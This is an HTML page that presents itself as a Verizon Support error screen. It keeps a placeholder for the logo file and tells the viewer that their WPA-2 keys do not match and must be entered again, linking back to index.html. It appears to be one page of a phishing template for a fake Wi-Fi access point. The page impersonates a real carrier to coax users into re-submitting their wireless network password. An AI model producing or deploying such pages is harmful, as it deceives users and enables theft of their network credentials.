<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon Support</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="verizon.css" rel="stylesheet" type="text/css" />
</head>

<body>
<div class="verizon" id="base" align="center">


<div class="verizon" id="logo" align="center">
<img src="placelogofilenamehere" alt="Verizon" align="center" />
</div>

<div class="verizon" id="box" >
<p align="center">Network Not Authorized</p>


<p align="left" class="verizon" id="normal" >&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
<strong>Error</strong>: Your WPA-2 keys do not match!</p>

<p align="left" class="verizon" id="normal" >&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
Please enter the keys again.</p>

<p align="left" class="verizon" id="normal">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="index.html">Click here</a> to go back...</p>

</div>

</div>
</body>

</html>
